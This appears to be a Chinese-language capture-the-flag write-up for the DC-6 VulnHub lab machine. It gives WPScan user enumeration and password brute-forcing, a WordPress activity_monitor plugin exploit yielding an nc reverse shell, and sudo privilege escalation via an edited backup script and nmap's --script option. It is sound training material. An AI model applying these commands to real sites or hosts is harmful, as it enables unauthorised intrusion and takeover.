DC系列(6)DC-6靶机渗透

0x00 前期准备

DC-6地址:https://www.vulnhub.com/entry/dc-6,315/
DC-6官wp:无

  1. 成功导入。
    在这里插入图片描述

  2. 官方要求把dc6的地址加入/etc/hosts。
    在这里插入图片描述

  3. 在kali终端扫描:nmap 172.20.10.0/24,找到dc6的ip地址为172.20.10.4。
    在这里插入图片描述

  4. 加入/etc/hosts。
    在这里插入图片描述

0x01 登陆

  1. 前期nmap扫描得开放80、22端口,访问网站。CMS采用WordPress。
    在这里插入图片描述

  2. 使用WPScan工具分析:wpscan --url http://wordy --enumerate,扫描到五个用户。
    在这里插入图片描述

  3. 把五个用户写入dc6user.txt,为后续准备。
    在这里插入图片描述

  4. 官网提示使用rocket.txt:cat /usr/share/wordlists/rockyou.txt | grep k01 > dc6passwd.txt。如果是第一次使用rockyou.txt,需要先进行解压:gzip -d /usr/share/wordlists/rockyou.txt.gz
    在这里插入图片描述
    在这里插入图片描述

  5. wpscan爆破:wpscan --url http://wordy/ -U dc6user.txt -P dc6passwd.txt,得到用户mark,密码helpdesk01。
    在这里插入图片描述

  6. 回到网页,寻找登陆页面:dirb http://wordy/,找到http://wordy/wp-admin。
    在这里插入图片描述

  7. 访问登陆界面,尝试用获取的mark-helpdesk01登陆。
    在这里插入图片描述

0x02 利用activity_monitor漏洞反弹shell

  1. 登录后可以看到安装了activity_monitor插件。猜测存在漏洞。
    在这里插入图片描述

  2. 查找漏洞searchsploit activity monitor -w
    在这里插入图片描述

  3. 点击查看网页漏洞。
    在这里插入图片描述

  4. 将html代码部分写入本地45274.html,修改相关地址。
    在这里插入图片描述

  5. Kali开启3456端口:python2 -m SimpleHTTPServer 3456,打开网页172.20.10.3:3456,找到45274.html并打开。
    在这里插入图片描述

  6. 同时,在kali监听7788端口:nc -lvvp 7788。点击网页的submit request,在kali终端显示反弹shell成功。
    在这里插入图片描述

0x03 bash脚本和nmap提权

  1. 使用交互式命令行:python -c 'import pty; pty.spawn("/bin/bash"),找到mark用户的家目录下的stuff文件夹,查看里面的things-to-do.txt。
    在这里插入图片描述

  2. 提示添加了新用户:graham - GSo7isUM1D4。切换用户:su graham
    在这里插入图片描述

  3. 查询graham用户的root权限指令:sudo -l,看到jens目录下有bash脚本。
    在这里插入图片描述

  4. 切换到该目录下查看backup.sh,内容是压缩备份web的文件。写入:echo "/bin/bash" >> backups.sh,意味着它会打开一个shell(此处会打开jens用户的shell)。
    在这里插入图片描述

  5. 使用jens的身份执行该脚本:sudo -u jens /home/jens/backups.sh,切换成功。同时查看jens的root权限,发现有nmap。
    在这里插入图片描述

  6. 在https://gtfobins.github.io/中查询到nmap的sudo提权方式如下,依次输入,提权成功。

    TF=$(mktemp)
    echo 'os.execute("/bin/sh")' > $TF
    sudo nmap --script=$TF
    

    在这里插入图片描述

  7. 进入root根目录,找到theflag.txt,渗透成功。
    在这里插入图片描述

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码

)">
< <上一篇
下一篇>>